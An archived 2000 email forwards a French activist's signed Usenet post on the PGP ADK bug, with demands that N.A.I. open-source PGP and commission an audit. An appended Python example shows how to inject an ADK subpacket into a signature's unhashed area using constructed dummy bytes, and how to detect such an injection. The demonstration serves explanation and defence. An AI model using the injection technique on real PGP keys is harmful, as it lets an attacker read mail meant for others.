27 August 2000.
Date: Sun, 27 Aug 2000 15:17:38 +0200
From: pgpenfrancais <pgpenfrancais@bigfoot.com>
To: jya@pipeline.com
CC: michel@bouissou.net
Subject: PGP in GPL to restore confidence?

John,

FYI, this very interesting message of Michel Bouissou, a French crypto-activist.

Cheers,

--
pgpenfrancais@bigfoot.com
PGP en francais
http://www.geocities.com/SiliconValley/Bay/9648/news.htm

****

From: "Michel Bouissou" <michel@bouissou.net>
Newsgroups: alt.security.pgp,comp.security.pgp.discuss,sci.crypt
Subject: PGP ADK Bug: What we expect from N.A.I.
Date: Sun, 27 Aug 2000 11:13:49 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The disastrous ADK bug recently discovered by Ralf Senderek in versions 5.x and 6.x of PGP has greatly compromised the trust that all of us crypto and privacy activists had in N.A.I. PGP.

In this message, I express not only my personal opinion, but as well the opinion of several crypto and privacy activists, long-time PGP supporters in France.

This bug is the most serious and threatening one ever discovered in PGP since its beginning.

Although N.A.I. quickly reacted to this bug by scanning and fixing their keyservers, publishing a new PGP 6.5.8 version that is supposed to be immune to the bug within 48 hours after its discovery, and also releasing a PGPrepair program which is supposed to clean forged public keys from keyrings, this still is far from enough. (We write "supposed" not because we distrust the efforts made by N.A.I., but because we estimate that these solutions cannot have been tested enough in this short timeframe to put full confidence into them).

We received information from N.A.I. stating that these countermeasures were the first steps taken in emergency, and we acknowledge that they were quick and reactive and that there was not much more that they could have done in such a short timeframe. We understand from N.A.I. employees' statements that more comprehensive and definitive solutions are yet to come and are looking forward to these solutions.
Yet, we regret that N.A.I. and / or Phil Zimmermann haven't so far released clearer explanations about what they think of this bug and its cause and consequences from a technical standpoint.

The fact that this bug can allow messages to be encrypted to somebody (an attacker) different from the intended message recipients makes it one of the most disastrous things that can happen to a public-key cryptosystem.

This bug being related to the "ADK / ARR" feature in PGP makes the issue still hotter, as this ADK feature has been contested and disapproved of from the beginning by the vast majority of PGP supporters, as well as a number of crypto specialists.

In any case, this "ADK / ARR" feature is a very sensitive thing, as incorporating such features in a cryptosystem creates one possible weakness and attack path. Ralf's discovery recently proved we were right to be worried about it.

This ADK system being so sensitive, we would have expected N.A.I. to have put the highest care in implementing, testing, securing and documenting it. Unfortunately, Ralf's work and our own tests proved this wasn't the case.

=> The bug exists, and can easily be exploited. This has been largely debated these last days.

=> The "warning" messages do not behave as one would expect from reading the manuals and option explanations.

=> The whole ADK concept and implementation is neither explained nor discussed in the PGP Freeware manual, maintaining ignorance and confusion about sensitive things which should be made very clear.

All this proves that this wasn't properly done, and, quoting Ralf Senderek's last public note:

<<<<<
>This is not a bug, this is a scandal, because NAI put ADKs into PGP
>without caring about simple manipulations. Obviously there has
>never been a well thought-out security strategy and most of the
>relevant information the public got from NAI concerning ADKs was
>completely untrue as my experiments reveal.
>>>>>

We regret to say that we must share and approve Ralf's point of view about this.
This weakness discovered in the v4 signature mechanism raises the issue of other possible weaknesses that might have been introduced in PGP when PGP5 was released, because it proves that things which should have been carefully checked and designed were not. And such a weakness stayed unnoticed for several years.

In light of this, we must acknowledge that Ralf Senderek's advice to trust only the PGP 2.6.x version makes sense.

Seeing that, and seeing that several small but very visible bugs have remained in the PGP G.U.I. for a very long time (such as a bug in the display of the main PGPkeys window, a bug in the display of keyserver search results...), we really have to worry about the overall quality and security of the PGP products.

Consequently, we suggest that:

- - N.A.I. should put the core of PGPFreeware under the GNU/GPL license. This would probably have no or little impact on the ability of N.A.I. to keep producing and selling commercial PGP versions and related security services, and would help much in restoring confidence.

- - N.A.I. should start cooperating, and not competing, with current PGP-compatible cryptosystem developments such as GnuPG.

- - N.A.I. should urgently have the current PGP versions and key formats reviewed by independent, competent, and well-known cryptographers, and should ask them to publish an independent audit report about their findings.

- - N.A.I. should communicate very clearly about the ADK issue, and the possible consequences of the existence of a non-hashed area in the v4 signature format. Although details about this signature format may be buried somewhere in a technical RFC or the like, N.A.I. should publicly discuss this signature format and the reason why such non-hashed areas were put into it.

- - N.A.I. should try its best to explain how this bug can have been introduced unnoticed in PGP, and why the implementation of the ADK feature has not been accompanied by security controls that meet the quality standards expected for such life-critical software.

- - N.A.I. should take appropriate measures to really kick this problem out. If this means having to abandon the current DH/DSS keys or signature format and develop a new, more robust format, this should be undertaken according to independent and competent cryptographers' advice.

- - N.A.I. should stop bundling PGP with other "security" features such as a VPN or firewall or intrusion detector that have nothing to do with the PGP core. PGP is PGP and may be accompanied by PGPdisk. The rest has nothing to do with PGP and could be sold by N.A.I. in different, separate software packages if they want. The more unnecessary and bulky things are included with PGP, the bigger PGP grows, the harder it becomes to review and control, and the higher the risk becomes that security-threatening bugs remain unnoticed.

- - N.A.I. should integrate into the next PGP releases an option to globally deactivate ADK encryption, even if this means refusing to encrypt anything to a recipient key which has an attached ADK.

- - And we wish that N.A.I. would release a freeware PGP version which is completely ADK-free.

Should N.A.I. choose to follow some of this advice, this would greatly help in restoring confidence, which has suffered much from this regrettable event.

Should N.A.I. choose to ignore these comments, this would surely lead many people to distrust the PGP software and move on to new systems such as GnuPG, which many of us are already seriously considering.

michel@bouissou.net

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
Comment: Corrigez le bug PGP ADK. Installez PGP 6.5.8 ou plus recent.
iQA/AwUBOajNvY7YarFcK+6PEQIsfgCeItaFxuENITYwHyarFt6h3oX4dwwAn305
MezqixhI0VhEObdogHcJU3rO
=Jkhe
-----END PGP SIGNATURE-----

****
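The technical point behind the letter is that a v4 signature packet carries an "unhashed" subpacket area which the signature hash does not cover, so a subpacket placed there can be added to an already-signed key without invalidating the signature. The following Python example, added here and not part of the original message nor of any PGP or N.A.I. code, parses a v4 signature packet body as framed in RFC 2440, shows that appending a subpacket to the unhashed area leaves the signed bytes untouched, and flags any subpacket that appears only in the unhashed area. The sample signature bytes are constructed; using subpacket type 10 for the ADK and the class / algorithm / fingerprint layout of its payload are assumptions made for this example, and the signature MPI is a dummy, so no cryptographic verification takes place.

```python
"""Hashed vs. unhashed subpackets in an OpenPGP v4 signature (RFC 2440 framing).
Added example; sample bytes are constructed, not taken from a real key."""
import struct

# Subpacket type numbers from RFC 2440 section 5.2.3.1. Type 10 is the
# "placeholder for backward compatibility"; treating it as the PGP ADK
# subpacket is an assumption for this example.
ADK_SUBPACKET_TYPE = 10
SUBPACKET_NAMES = {2: "signature creation time", 16: "issuer key ID",
                   ADK_SUBPACKET_TYPE: "ADK (assumed type 10)"}


def encode_subpacket(sptype: int, payload: bytes) -> bytes:
    """Encode one subpacket using the 1-octet length form (bodies < 192 bytes)."""
    body = bytes([sptype]) + payload
    assert len(body) < 192, "1-octet length form only"
    return bytes([len(body)]) + body


def build_v4_signature_body(hashed: list, unhashed: list) -> bytes:
    """Assemble a v4 signature packet body: version, type, pk alg, hash alg,
    hashed area, unhashed area, left-16 hash bits, signature MPI (all dummy)."""
    h = b"".join(encode_subpacket(t, p) for t, p in hashed)
    u = b"".join(encode_subpacket(t, p) for t, p in unhashed)
    return (bytes([4, 0x13, 17, 2])            # v4, positive certification, DSA, SHA-1
            + struct.pack(">H", len(h)) + h
            + struct.pack(">H", len(u)) + u
            + b"\xab\xcd"                      # left 16 bits of the hash (dummy)
            + b"\x00\x01\x01")                 # dummy 1-bit MPI


def parse_subpackets(area: bytes) -> list:
    """Return [(type, payload), ...]; handles the 1-, 2- and 5-octet length forms."""
    out, i = [], 0
    while i < len(area):
        first = area[i]
        if first < 192:
            length, i = first, i + 1
        elif first < 255:
            length, i = ((first - 192) << 8) + area[i + 1] + 192, i + 2
        else:
            length, i = struct.unpack(">I", area[i + 1:i + 5])[0], i + 5
        body = area[i:i + length]
        if length == 0 or len(body) != length:
            raise ValueError("truncated or empty subpacket")
        out.append((body[0] & 0x7F, bytes(body[1:])))   # mask the critical bit
        i += length
    return out


def _areas(body: bytes):
    """Offsets of the hashed and unhashed areas inside a v4 signature body."""
    if body[0] != 4:
        raise ValueError("not a v4 signature")
    hashed_end = 6 + struct.unpack(">H", body[4:6])[0]
    unhashed_end = hashed_end + 2 + struct.unpack(">H", body[hashed_end:hashed_end + 2])[0]
    return hashed_end, unhashed_end


def parse_v4_signature_body(body: bytes) -> dict:
    hashed_end, unhashed_end = _areas(body)
    return {
        "sig_type": body[1], "pk_alg": body[2], "hash_alg": body[3],
        "hashed": parse_subpackets(body[6:hashed_end]),
        "unhashed": parse_subpackets(body[hashed_end + 2:unhashed_end]),
        # Per RFC 2440 5.2.4 the hash covers the body from the version octet
        # through the end of the hashed area; nothing after it is protected.
        "signed_portion": body[:hashed_end],
    }


def unhashed_only(parsed: dict, sptype: int) -> list:
    """Payloads of `sptype` found in the unhashed area but not in the hashed one:
    these are exactly the values a signer never vouched for."""
    vouched = {p for t, p in parsed["hashed"] if t == sptype}
    return [p for t, p in parsed["unhashed"] if t == sptype and p not in vouched]


def inject_unhashed(body: bytes, sptype: int, payload: bytes) -> bytes:
    """Append a subpacket to the unhashed area of a signed body, leaving the
    hashed area (and therefore the signature) unchanged."""
    hashed_end, unhashed_end = _areas(body)
    new_u = body[hashed_end + 2:unhashed_end] + encode_subpacket(sptype, payload)
    return body[:hashed_end] + struct.pack(">H", len(new_u)) + new_u + body[unhashed_end:]


# Constructed self-signature: creation time and issuer key ID in the hashed area, no ADK.
LEGIT = build_v4_signature_body(
    hashed=[(2, b"\x39\xa8\xcd\xbd"), (16, b"\x8e\xd8\x6a\xb1\x5c\x2b\xee\x8f")],
    unhashed=[])
# Constructed ADK payload: class octet, pk algorithm, 20-byte fingerprint (assumed layout).
ATTACKER_ADK = b"\x80\x11" + b"\x11" * 20
TAMPERED = inject_unhashed(LEGIT, ADK_SUBPACKET_TYPE, ATTACKER_ADK)


def demo() -> tuple:
    """(signed bytes unchanged?, ADK payloads that only appear in the unhashed area)."""
    legit, tampered = parse_v4_signature_body(LEGIT), parse_v4_signature_body(TAMPERED)
    return legit["signed_portion"] == tampered["signed_portion"], \
        unhashed_only(tampered, ADK_SUBPACKET_TYPE)


if __name__ == "__main__":
    unchanged, rogue = demo()
    print("hashed bytes unchanged after injection:", unchanged)
    for p in rogue:
        print("ADK only in unhashed area, fingerprint", p[2:].hex())
```

The check that matters is `unhashed_only`: an implementation that honours an ADK subpacket only when it sits in the hashed area ignores the injected one, whereas one that reads both areas indiscriminately will encrypt to the attacker's fingerprint even though the key's signature still verifies.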